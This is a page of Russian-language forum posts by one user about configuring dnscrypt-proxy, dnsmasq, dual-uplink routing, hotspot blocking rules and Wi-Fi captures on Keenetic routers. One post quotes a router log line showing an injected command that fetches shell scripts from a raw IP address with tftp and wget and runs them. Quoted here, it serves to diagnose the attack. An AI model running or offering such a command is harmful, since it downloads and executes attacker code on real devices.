-
Posts
4,392 -
Joined
-
Last visited
-
Days Won
75
Content Type
Profiles
Forums
Gallery
Downloads
Blogs
Events
Posts posted by vasek00
-
-
-
При первом приближение все работает на два канала при
Скрытый текстdnsmasq.conf
...
server=127.0.0.2#65053
server=127.0.0.2#65153
all-servers
dnscrypt-proxydnscrypt-proxy --local-address=127.0.0.2:65053 --daemonize –edns-payload-size=1252 -R cisco \
-l /opt/tmp/dnscrypt-proxy.65053.log -m 7 --plugin=libdcplugin_example_ldns_blocking.so,--ips=/opt/tmp/blk-ips,--domains=/opt/tmp/blk-names
dnscrypt-proxy --local-address=127.0.0.2:65153 --daemonize –edns-payload-size=1252 -R dnscrypt.eu-dk \
-l /opt/tmp/dnscrypt-proxy.65153.log -m 7 --plugin=libdcplugin_example_ldns_blocking.so,--ips=/opt/tmp/blk-ips,--domains=/opt/tmp/blk-names
плюс :
1. стат. маршрут на dnscrypt.eu-dk через WEB для host - 77.66.84.233
2. в итоге два канала и маршрут, где провайдер1 ppp0 один приоритет 1000 и ppp1 провайдер2 приоритет 800, в данном случае основной ppp0 резервный ppp1
/opt/etc/init.d # ip ro
default dev ppp0 scope link
77.66.84.233 dev ppp1 scope link
...IP_prov_II dev ppp1 scope link
.../opt/etc/init.d #
По dnsmasq запросы имеют такой вид
Aug 19 14:12:01 dnsmasq[2088]: query[A] wendang.baidu.com from 192.168.1.2
Aug 19 14:12:01 dnsmasq[2088]: forwarded wendang.baidu.com to 127.0.0.2
Aug 19 14:12:01 dnsmasq[2088]: forwarded wendang.baidu.com to 127.0.0.2
Aug 19 14:12:01 dnsmasq[2088]: query[A] incoming.telemetry.mozilla.org from 192.168.1.2
Aug 19 14:12:01 dnsmasq[2088]: forwarded incoming.telemetry.mozilla.org to 127.0.0.2
Aug 19 14:12:01 dnsmasq[2088]: forwarded incoming.telemetry.mozilla.org to 127.0.0.2По dnscrypt-proxy логу
65053.log
...
Sat Aug 19 14:55:30 2017 127.0.0.1 forum.keenetic.net A
Sat Aug 19 14:55:30 2017 127.0.0.1 r270260.tryinvision.com A
Sat Aug 19 14:55:37 2017 127.0.0.1 app-measurement.com A
Sat Aug 19 14:56:04 2017 127.0.0.1 incoming.telemetry.mozilla.org A65153.log
...
Sat Aug 19 14:55:30 2017 127.0.0.1 forum.keenetic.net A
Sat Aug 19 14:55:30 2017 127.0.0.1 r270260.tryinvision.com A
Sat Aug 19 14:55:37 2017 127.0.0.1 app-measurement.com A
Sat Aug 19 14:56:04 2017 127.0.0.1 incoming.telemetry.mozilla.org AВ данном случае все запросы для dnscrypt-proxy идут от dnsmasq
В итоге, запрос от клиента локальной сети попадает на роутер c него уходят запросы сразу же на два resolv - cisco и dnscrypt.eu-dk и два есть прихода ответов на эти запросы, очередность запросов всегда одна а вот очередность прихода ответов на эти запросы бывают разные (т.е. то с одного канала первым приходит, то со второго канала приходит)
-
На релизе dnscrypt-proxy 1.9.5 есть возможность использовать списки блокировки используя plugins
Скрытый текст/opt/lib/dnscrypt-proxy # ls -l
-rwxr-xr-x 1 root root 8408 Jun 13 15:54 libdcplugin_example_cache.so
-rwxr-xr-x 1 root root 4052 Jun 13 15:54 libdcplugin_example_ldns_aaaa_blocking.so
-rwxr-xr-x 1 root root 16640 Jun 13 15:54 libdcplugin_example_ldns_blocking.so
-rwxr-xr-x 1 root root 8368 Jun 13 15:54 libdcplugin_example_ldns_forwarding.so
-rwxr-xr-x 1 root root 5836 Jun 13 15:54 libdcplugin_example_ldns_opendns_deviceid.so
-rwxr-xr-x 1 root root 5568 Jun 13 15:54 libdcplugin_example_ldns_opendns_set_client_ip.so
-rwxr-xr-x 1 root root 7228 Jun 13 15:54 libdcplugin_example_logging.so
/opt/lib/dnscrypt-proxy #например строка запуска
ARGS="--local-address=127.0.0.2:65053 --daemonize –edns-payload-size=1252 -R cisco -l /opt/tmp/dnscrypt-proxy.65053.log -m 7 \
--plugin=libdcplugin_example_ldns_blocking.so,--ips=/opt/tmp/blk-ips,--domains=/opt/tmp/blk-names"
где в файлах /opt/tmp/blk-names и /opt/tmp/blk-ips естественно лежат имена и адреса нужных для блокировки в формате - адреса IPv4 и IPv6, а для имен групповые символы (*) пример *xxx*, *.example.com, ads.*
простой пример блокировки youtube.com -> в файле /opt/tmp/blk-names прописать youtube.com
Можно использовать как альтернативу в место dnsmasq
addn-hosts=/opt/tmp/hosts0 addn-hosts=/opt/tmp/malwaredom_block.host addn-hosts=/opt/tmp/mvps_block.host
Другие примеры:
# dnscrypt-proxy --plugin=libdcplugin_example_ldns_opendns_set_client_ip.so,192.30.252.130
# dnscrypt-proxy --plugin=libdcplugin_example_ldns_opendns_deviceid.so,/opt/etc/umbrella-password.txt
так же возможен вариант например использовать не один а два резолва:
ARGS1="--local-address=127.0.0.2:65053 --daemonize .... -R cisco -l /opt/tmp/dnscrypt-proxy.65053.log -m 7 ...." ARGS2="--local-address=127.0.0.2:65153 --daemonize .... -R ns0.dnscrypt.is -l /opt/tmp/dnscrypt-proxy.65153.log -m 7 ...."
тогда в dnsmasq конфиге
server=127.0.0.2#65053 server=127.0.0.2#65153
А если добавить в конфиг строчку all-servers то можно получить одновременно запрос на все сервера которые имеются в строчках server (порождает чуток избыточный трайик, но по моему у кого безлим не принципиально). А если еще и два канала то запросы можно развернуть один на один канал, другой на другой (хоть он например и в резерве весит) информация по IP для маршрута можно взять из файла dnscrypt-resolvers-conf ищется нужная запись и на против нее поиск Ip адреса или любым приложением которое есть в opkg или в системе.
-
Релиз 2.10
Проверьте еще раз настройку (можно конфиг посмотреть для достоверности, а то может WEB что-то начудил, при не однократной настройке), отключите pingchek.
Должно все работать.
Скрытый текст/ # ip ro
default dev ppp1 scope link
...
хх.хх.хх.1 dev ppp0 proto kernel scope link src хх.хх.хх.172
yy.yy.yy.3 via yy.yy.yy.1 dev eth2.4
yy.yy.yy.0/19 dev eth2.4 proto kernel scope link src yy.yy.yy.2
192.168.1.0/24 dev br0 proto kernel scope link src 192.168.1.100
...yy.yy.yy.26 dev ppp1 proto kernel scope link src yy.yy.yy.2
/ #Меняю канал
/ # ip ro
default dev ppp0 scope link
....yy.yy.yy.26 dev ppp1 proto kernel scope link src yy.yy.yy.2
/ #Для системы по барабану основной или резервный - только default маршрут, а вот переключение его и что считать основным и резервным это уже доп.функция основанная на приоритете интерфейса и доступности другой стороны на нем.
- 1
-
С 15.08 с того что выше по логам
Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:51:21 2017 [DEBUG] resolver timeout (UDP)
по 17.08 13:23 тишина - все ОК, 15.08 после этой ошибки в 12:00 вернулся на cisco resolv, до этого был cypherpunks.ru
-
Словил ошибку, все больше склоняюсь что все таки на роутере что-то забывает соединения, после продолжительного времени без действия клиента (не пользованием браузером минут 40) вчера сменил cisco на dnscrypt-proxy --local-address=127.0.0.2:65053 --daemonize dns-payload-size=1252 -R cypherpunks.ru
dnscrypt-proxy Tue Aug 15 10:23:57 2017 [INFO] Server key fingerprint is CC02:411D:EA4B:F44D:0E5F:7A18:957B:E8DD:F059:C259:B504:473E:4453:F3BB:CB95:8203 Tue Aug 15 11:23:59 2017 [INFO] Refetching server certificates Tue Aug 15 11:23:59 2017 [INFO] Server certificate with serial #1493333335 received Tue Aug 15 11:23:59 2017 [INFO] This certificate is valid Tue Aug 15 11:23:59 2017 [INFO] Chosen certificate #14933333335 is valid from [2017-05-26] to [2018-05-26] Tue Aug 15 11:23:59 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy. Tue Aug 15 11:23:59 2017 [INFO] Server key fingerprint is CC02:411D:EA4B:F44D:0E5F:7A18:957B:E8DD:F059:C259:B504:473E:4453:F3BB:CB95:8203 Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:51:21 2017 [DEBUG] resolver timeout (UDP) По Dnsmasq Aug 15 11:50:24 dnsmasq[789]: query[A] dns.msftncsi.com from 192.168.130.2 Aug 15 11:50:24 dnsmasq[789]: forwarded dns.msftncsi.com to 127.0.0.2 ... Aug 15 11:50:26 dnsmasq[789]: query[A] avatars.mds.yandex.net from 192.168.130.2 Aug 15 11:50:26 dnsmasq[789]: forwarded avatars.mds.yandex.net to 127.0.0.2 Aug 15 11:50:26 dnsmasq[789]: query[A] yastatic.net from 192.168.130.2 Aug 15 11:50:26 dnsmasq[789]: forwarded yastatic.net to 127.0.0.2 ... Aug 15 11:50:30 dnsmasq[789]: query[A] forum.keenetic.net from 192.168.130.2 Aug 15 11:50:30 dnsmasq[789]: forwarded forum.keenetic.net to 127.0.0.2 Aug 15 11:50:30 dnsmasq[789]: query[A] forum.keenetic.net from 192.168.130.2 Aug 15 11:50:30 dnsmasq[789]: forwarded forum.keenetic.net to 127.0.0.2
сегодня в 11:50 попытка просмотреть страницу которая открылась спустя наверное 1-1,5минуту после повторного нажатия открытия.
Дерганье netfilter.d Tue Aug 15 11:14:46 MSK 2017 track --- tables = filter Tue Aug 15 11:57:07 MSK 2017 track --- tables = filter Log роутера Aug 15 11:14:46ndm kernel: IPv4 conntrack lan: flushed 1 entries with address 192.168.130.19 Aug 15 11:14:46ndm kernel: SWNAT bind table cleared Aug 15 11:57:07ndm kernel: SWNAT bind table cleared
-
Проверьте конфиг в ручную, на какие строчки обратить внимание у вас было раньше в WEB - /#security.acl (или он же Межсетевой экран)
Скрытый текстконфиг файл строчки
access-list _WEBADMIN_Home
permit tcp 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 port eq 80
permit tcp 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 port eq 443...
правила разрешающие проход из "Home" куда угодно для 80/443 или их результат можно найти iptables -nvL в "Chain @Home"
Скрытый текстChain @Home (1 references)
pkts bytes target prot opt in out source destination
0 0 ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80
0 0 ACCEPT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:443при запрете через WEB - /#home.hosts для данного клиента в конфиге получите запись
Скрытый текстконфиг файл строчки
ip hotspot
host хх:хх:хх:хх:хх:24 denyили по iptables получите в "Chain _NDM_HOTSPOT_FWD" правило на DROP для данного клиента. Но если у вас в конфиге есть правила из security.acl то запрет в home.hosts не поможет из-за того что написано выше про 80/443 порты.
В данном случае просто посмотрите свой конфиг.
-
Скрытый текст
dnscrypt-proxy
Thu Aug 10 15:41:19 2017 [DEBUG] resolver timeout (UDP)
Thu Aug 10 15:59:33 2017 [INFO] Refetching server certificates....
Fri Aug 11 14:06:18 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
Fri Aug 11 14:09:58 2017 [DEBUG] resolver timeout (UDP)
Fri Aug 11 14:10:07 2017 [DEBUG] resolver timeout (UDP)
Fri Aug 11 14:10:13 2017 [DEBUG] resolver timeout (UDP)
Fri Aug 11 15:07:41 2017 [INFO] Refetching server certificates...
Sun Aug 13 09:38:33 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
За Aug 11 всего один раз, за Aug 12 не разу.
-
16 минут назад, edm сказал:
подтверждаю, через веб-интерфейс сделал сброс.
вникнуть в дело конфигов особого желания нет: разобраться, что какая переменная за что работает, по какому алгоритму работает и т.д.
Всё должно работать из коробки.
Вы уверены что все должно работать из коробки, далеко ходить не надо берем пример с Windows у которой каждый месяц выходят дополнения и обновления, второе не мало важное где вы виделе чтоб в коробке стояло 2.10.х.х.х-х?
По поводу - желания нет: разобраться время сейчас такое, что даже для настройки цифрового ТВ нужны кой какие знания, а уж про смарт телефон молчу.
-
12 часа назад, edm сказал:
почему тогда при - 4. сделал сброс настроек.
всё еще - 5. проверил запрет доступа в интернет. Всё еще не блокирует.
?
Первое вы уверены что сделали - сброс настроек, не на словах что нажали кнопку сброс к заводским или через WEB? Второе можно было проверить - конфиг что в нем и как.
-
12 часа назад, edm сказал:
6. установил специально firmware_mini (т.е. там только компоненты "Интерфейкс Wi-Fi", "Интерфейс USB", 3 компонента из Mods, "Ограничения скорости интернета", "Общий доступ к файлам и принтенам", "Интернет фильтр Яндекс.DNS", "FTP-сервер", "Поддержка USB-накопителей", "Контроль доступа к папкам" и "Поддержка открытых пакетов".
7. проверил запрет доступа в интернет. О! блокирует.
Вам надо проанализировать и сравнить файлы startup-config_mini.txt и startup-config.txt. И понять, в чем дело.
Есть несколько типов роутеров - на всех стоят полные компоненты, того что у вас не замечал, конфиг файл нужно было проверить на наличие переменных те про которые написаны выше.
-
31 минуту назад, edm сказал:
не понимаю как им пользоваться. я ее знаток в линуксе.
При настройках через "ip hotspot" и "ip dhcp host клиент" (через WEB роутера так же) получаем
Скрытый текстknown host PS3 хх:хх:хх:хх:хх:d9
ip dhcp host хх:хх:хх:хх:хх:d9 192.168.1.21
ip hotspot
...host хх:хх:хх:хх:хх:d9 deny
default-policy denyи так же созданные правила, так как клиент локальный то "Chain FORWARD"->"Chain _NDM_FORWARD"->"Chain _NDM_HOTSPOT_FWD" в итоге пакетики для данного клиента который выше описан в "hotspot" пападут в "Chain _NDM_HOTSPOT_FWD" под критерий DROP
Скрытый текстChain _NDM_HOTSPOT_FWD (1 references)
pkts bytes target prot opt in out source destination
...147 8836 DROP all -- br0 * 192.168.1.21 0.0.0.0/0
...
другие же клиенты попадут в "Chain _NDM_HOTSPOT_FWD" под критерий RETURN (выход без обработки или "разрешен" выход в интернет).
pkts - кол-во пакетов, target - цель, prot - протокол, in - вход, out - выход, source - источник, destination - получатель.
Чем больше клиент пытается как бы выйти в интернет тем больше растет число "заблокированных" пакетов, если данному клиенту дать "разрешение" выхода в интернет то данное правило для него измениться
Скрытый текстChain _NDM_HOTSPOT_FWD (1 references)
pkts bytes target prot opt in out source destination
...
32 3254 RETURN all -- br0 * 192.168.1.21 0.0.0.0/0
0 0 RETURN all -- * br0 0.0.0.0/0 192.168.1.21...
Почему два - по тому что в обе стороны "src -> dst", br0 - основной интерфейс роутера, он же в понимание Zyxel конфига :
Скрытый текстinterface Bridge0
rename Home
description "Home VLAN"
inherit FastEthernet0/Vlan1
include AccessPoint
security-level private
ip address 192.168.1.100 255.255.255.0 -
Улучшена работа DNSCrypt-proxy тестовое обновление http://entware-3x.zyxmon.org/binaries/mipsel/test/dnscrypt-proxy_1.9.5-4a_mipsel-3x.ipk и
http://entware-3x.zyxmon.org/binaries/mipsel/test/libsodium_1.0.13-1_mipsel-3x.ipk
- 1
-
Сеть работает, потом перестает работать и в делает вход клиентом на ПК с одновременным анализом wi-fi (тогда будет видно что и кто пытается из них БС или клиент ПК зарегистрироваться)
-
Скрытый текст
Sat Aug 5 14:18:35 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5
...
Sun Aug 6 12:42:21 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
Sun Aug 6 13:16:38 2017 [NOTICE] Stopping proxy
Sun Aug 6 13:16:38 2017 [INFO] UDP listener shut down
Sun Aug 6 13:16:38 2017 [INFO] TCP listener shut down
Sun Aug 6 13:17:39 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5
Sun Aug 6 13:17:40 2017 [INFO] Generating a new session key pair...
Sun Aug 6 13:17:40 2017 [NOTICE] Proxying from 127.0.0.2:65053 to 208.67.220.220:443
Sun Aug 6 13:55:42 2017 [NOTICE] Stopping proxy
Sun Aug 6 13:55:42 2017 [INFO] UDP listener shut down
Sun Aug 6 13:55:42 2017 [INFO] TCP listener shut down
Sun Aug 6 13:56:49 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5
Sun Aug 6 13:56:49 2017 [INFO] Generating a new session key pair
Sun Aug 6 13:56:49 2017 [INFO] Done... все хорошо до
Mon Aug 7 09:10:04 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
Mon Aug 7 09:28:26 2017 [DEBUG] resolver timeout (UDP)
Mon Aug 7 09:28:29 2017 [DEBUG] resolver timeout (UDP)
Mon Aug 7 10:11:14 2017 [INFO] Refetching server certificates... опять хорошо до
Wed Aug 9 07:49:20 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
Wed Aug 9 08:39:53 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 08:39:54 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 08:39:55 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 08:39:57 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 08:40:01 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 08:40:06 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 08:41:34 2017 [NOTICE] Stopping proxy
Wed Aug 9 08:41:34 2017 [INFO] UDP listener shut down
Wed Aug 9 08:41:34 2017 [INFO] TCP listener shut down
Wed Aug 9 08:42:37 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5
Wed Aug 9 08:42:37 2017 [INFO] Generating a new session key pair
Wed Aug 9 08:42:37 2017 [INFO] Done... хорошо до
Wed Aug 9 16:49:03 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
Wed Aug 9 17:46:57 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:46:57 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:46:58 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:46:58 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:46:59 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:46:59 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:48:21 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:49:06 2017 [INFO] Refetching server certificates
Wed Aug 9 17:49:06 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:49:06 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:49:07 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:49:07 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:49:07 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:49:09 2017 [DEBUG] resolver timeout (UDP)
Wed Aug 9 17:49:11 2017 [INFO] Server certificate with serial #1493333338 received
Wed Aug 9 17:49:11 2017 [INFO] This certificate is valid...
... хорошо до сегодня 100817 12:00
Смотрю дальше, проблем пока не видно, если не смотреть данный лог от dnscrypt-proxy то все ОК. Сервер пока один cisco протокл UDP.
- 1
-
1 час назад, Dhampir113 сказал:
а он есть в захвате gn 20/40
вообще ничего не трогал кроме wifi модема после сброса, где это крутить?
в том то и дело, что я уже склоняюсь к тому чтобы в настройках wifi поставить стандарт 802.11bg (на нем все работает) и закрыть эту тему, так как найти что там происходит с 802.11n нашими усилиями практически нереально
Давайте уточним - в момент отвала если он был в gn-2040 БС не пропадала она вещала, что жива и здорова - ManagementBeacon на [*BROADCAST], второе если не вникать в "HTTP:Response, HTTP/1.1, Status: Ok, URL: /rootDesc.xml" то считаем что идет обмен от БС для данного клиента просто в наличие пакетов => сеть wi-fi работает с данным клиентом (13:14-13:25 на всем этапе захвата).
Но в данном интервале не понятно с 192.168.1.46 как то странно ведет себя и очень часто сыпит :
Скрытый текст487 13:15:28 07.08.2017 41.7521473 Unavailable 192.168.1.46 192.168.1.62 HTTP HTTP:Response, HTTP/1.1, Status: Ok, URL: /WSD/DEVICE {HTTP:108, TCP:107, IPv4:75}
488 13:15:28 07.08.2017 41.7531128 Unavailable 192.168.1.46 192.168.1.62 HTTP HTTP:Response, HTTP/1.1, Status: Ok, URL: /WDP/PRINT {HTTP:101, TCP:98, IPv4:75}
489 13:15:28 07.08.2017 41.7531128 Unavailable 192.168.1.46 192.168.1.62 HTTP HTTP:HTTP Payload, URL: /WSD/DEVICE {HTTP:108, TCP:107, IPv4:75}
490 13:15:28 07.08.2017 41.7531128 Unavailable 192.168.1.46 192.168.1.62 HTTP HTTP:HTTP Payload, URL: /WDP/PRINT {HTTP:101, TCP:98, IPv4:75}
507 13:15:28 07.08.2017 41.7876346 Unavailable 192.168.1.62 192.168.1.46 HTTP HTTP:HTTP Payload, URL: /WDP/SCAN {HTTP:112, TCP:111, IPv4:75}
....
710 13:15:31 07.08.2017 44.9170639 System 192.168.1.62 192.168.1.46 HTTP HTTP:Response, HTTP/1.1, Status: Accepted, URL: /8a10a700-f4f6-4b22-9312-972a8d010e74 {HTTP:117, TCP:116, IPv4:75}
последнее по времени и потом только "проснулся" через 7мин, если только вы его не разбудили каким либо действием.
2875 13:22:58 07.08.2017 491.2953328 Unavailable 192.168.1.46 192.168.1.62 HTTP HTTP:Response, HTTP/1.1, Status: Ok, URL: /WDP/PRINT {HTTP:491, TCP:490, IPv4:75}
...
и опять он в процессе
2948 13:22:59 07.08.2017 492.5273629 Unavailable 192.168.1.46 192.168.1.62 HTTP HTTP:HTTP Payload, URL: /WDP/SCAN {HTTP:496, TCP:495, IPv4:75}
2950 13:22:59 07.08.2017 492.5273629 Unavailable 192.168.1.46 192.168.1.62 HTTP HTTP:HTTP Payload, URL: /WDP/SCAN {HTTP:496, TCP:495, IPv4:75}
2951 13:22:59 07.08.2017 492.5273629 Unavailable 192.168.1.46 192.168.1.62 HTTP HTTP:HTTP Payload, URL: /WDP/SCAN {HTTP:496, TCP:495, IPv4:75}
На счет аренды в 2минуты даже не скажу потому что это
Скрытый текст3505 13:24:39 07.08.2017 592.3401842 0.0.0.0 255.255.255.255 IPv4 IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 281, Total IP Length = 72 {IPv4:194}
Frame: Number = 3505, Captured Frame Length = 136, MediaType = WiFi
- WiFi: [Unencrypted Data] F.....P, (I) RSSI = -32 dBm, Rate = 6.0 Mbps
+ MetaData: RSSI = -32 dBm, Rate = 6.0 Mbps
+ FrameControl: Version 0,Data, Data, F.....P(0x4208)
Duration: 0 (0x0)
DA: *BROADCAST
BSSID: EC43F6 007BB8
SA: 94DE80 4D418C
+ SequenceControl: Sequence Number = 427
+ LLC: Unnumbered(U) Frame, Command Frame, SSAP = SNAP(Sub-Network Access Protocol), DSAP = SNAP(Sub-Network Access Protocol)
+ Snap: EtherType = Internet IP (IPv4), OrgCode = XEROX CORPORATION
+ Ipv4: Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 281, Total IP Length = 72если бы для всех то и сам бы 192.168.1.62 терял бы ее или анализатор не правильно распознал.
Берете одного клиента и только - гоняете его по wi-fi потом другого.
-
Мне вот интересно какое отношение ко всему этому имеет
[E] Aug 9 01:41:22 ndm: Core::Authenticator: no such user: "cd /tmp || cd /mnt || cd /var; tftp -r tftp.sh -g 89.248.162.146; sh tftp.sh; wget http://89.248.162.146/bin.sh; sh bin.sh; busybox wget http://89.248.162.146/bin1.sh; sh bin1.sh".
скачать tftp.sh запустить его и далее два bin (это html страница для вывода на экрна информации про Wowza Media Server)
-
-
22 часа назад, Dhampir113 сказал:
сделал: фиксирован канал (7), сеть не грузил, клиенты постарался отдалить от снимающего компа:
-bgn 20 bgn-7-20.cap
-bgn 20/40 bgn-7-2040.cap
-gn 20 gn-7-20.cap
-gn 20/40 gn-7-2040.cap
недоступность (отвал) соединения по вафле была во всех этих режимах, сейчас работает на 802.11 bg без проблем
Нужно было еще снять когда произошел отвал.
1. в данных файлах нет не чего такого серьезного - БС вещает и жива.
2. есть проблемы на ...1.70 - PARENTS-PS 94:DE:20 ..... выражается это в том что потеря связи и очень часто, во всех файлах для ...1.70 PARENTS-PS.
Скрытый текст960 13:16:15 07.08.2017 88.6139787 192.168.1.62 PARENTS-PC ICMP ICMP:Destination Unreachable Message, Port Unreachable, 192.168.1.62:51276 {IPv4:21}
961 13:16:15 07.08.2017 88.6140452 FE80:0:0:0:7CA8:A5DA:476:17D4 PARENTS-PC ICMPv6 ICMPv6:Destination unreachable {IPv6:23}
980 13:16:18 07.08.2017 91.9552922 FE80:0:0:0:7CA8:A5DA:476:17D4 PARENTS-PC ICMPv6 ICMPv6:Destination unreachable {IPv6:23}
981 13:16:18 07.08.2017 91.9559877 192.168.1.62 PARENTS-PC ICMP ICMP:Echo Request Message, From 192.168.1.62 To 192.168.1.70 {IPv4:21}
1079 13:16:39 07.08.2017 112.3690895 0.0.0.0 255.255.255.255 IPv4 IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 277, Total IP Length = 72 {IPv4:194}
это пакет для DA: *BROADCAST - BSSID: EC43F6 007BB8 - SA: 94DE80 4D418C (это PARENTS-PC)
1131 13:16:50 07.08.2017 123.2453407 PARENTS-PC 192.168.1.62 ARP ARP:Request, 192.168.1.70 asks for 192.168.1.62
1132 13:16:50 07.08.2017 123.2454540 192.168.1.62 PARENTS-PC ARP ARP:Response, 192.168.1.62 at 84-A6-C8-57-37-5D
1133 13:16:50 07.08.2017 123.2455423 PARENTS-PC FE80:0:0:0:7CA8:A5DA:476:17D4 ICMPv6 ICMPv6:Neighbor Solicitation, Target = FE80:0:0:0:7CA8:A5DA:476:17D4 {IPv6:23}
1136 13:16:50 07.08.2017 123.7323927 192.168.1.62 PARENTS-PC ICMP ICMP:Echo Request Message, From 192.168.1.62 To 192.168.1.70 {IPv4:21}
1137 13:16:51 07.08.2017 124.1456526 192.168.1.1 PARENTS-PC ARP ARP:Request, 192.168.1.1 asks for 192.168.1.70
1141 13:16:52 07.08.2017 125.7840868 [EC43F6 007BB8] [*BROADCAST] WiFi WiFi:[ ManagementBeacon] ....... RSSI = -28 dBm, Rate = 1.0 Mbps, SSID = AstMedia, Channel = 7
...
1654 13:18:39 07.08.2017 232.3878075 0.0.0.0 255.255.255.255 IPv4 IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 278, Total IP Length = 72 {IPv4:194}
...
2229 13:20:39 07.08.2017 352.4059381 0.0.0.0 255.255.255.255 IPv4 IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 279, Total IP Length = 72 {IPv4:194}
...
2771 13:22:38 07.08.2017 471.7071110 [EC43F6 007BB8] [*BROADCAST] WiFi WiFi:[ ManagementBeacon] ....... RSSI = -31 dBm, Rate = 1.0 Mbps, SSID = AstMedia, Channel = 7
2772 13:22:39 07.08.2017 472.4241918 0.0.0.0 255.255.255.255 IPv4 IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 280, Total IP Length = 72 {IPv4:194}
...
3504 13:24:38 07.08.2017 591.6668933 FE80:0:0:0:7CA8:A5DA:476:17D4 PARENTS-PC TCP TCP:[SynReTransmit #3430]Flags=......S., SrcPort=51532, DstPort=Microsoft-DS(445), PayloadLen=0, Seq=3908574738, Ack=0, Win=64800 ( Negotiating scale factor 0x8 ) = 64800 {TCP:578, IPv6:23}
3505 13:24:39 07.08.2017 592.3401842 0.0.0.0 255.255.255.255 IPv4 IPv4:Src = 0.0.0.0, Dest = 255.255.255.255, Next Protocol = 0x8b, Packet ID = 281, Total IP Length = 72 {IPv4:194}
Это так задумано интервал аренды 2минуты для PARENTS-PC или что-то с настройками у него.
-
За сутки с небольшим - анализ работы на много лучше чем было ранее (ощущение по отзывчивости). Так проверял в основном udp работу при конфиге ниже :
Скрытый текстDNSmasq
no-resolv
interface=br0
bind-interfaces
listen-address=192.168.1.100
#except-interface=lo
server=127.0.0.2#60053
addn-hosts=/opt/tmp/hosts0
addn-hosts=/opt/tmp/malwaredom_block.host
addn-hosts=/opt/tmp/mvps_block.host
cache-size=150 и так же с cache-size=0
log-queries
log-facility=/opt/var/log/dnsmasq.log
log-async=25dnscrypt-proxy --local-address=127.0.0.2:65053 --daemonize –edns-payload-size=1252 -R cisco -l /opt/tmp/dnscrypt-proxy.60053.log -m 7
-m --loglevel=<level>: don't log events with priority above this level after the service has been started up. Default is 6, the value for LOG_INFO. Valid values are 0 (system is unusable), 1 (action must be taken immediately), 2 (critical conditions), 3 (error conditions), 4 (warning conditions), 5 (normal but significant condition), 6 (informational) and 7 (debug-level messages).
Созданный dnscrypt-proxy.60053.log чистый с момента запуска в нем тишина. Пока без замечаний.
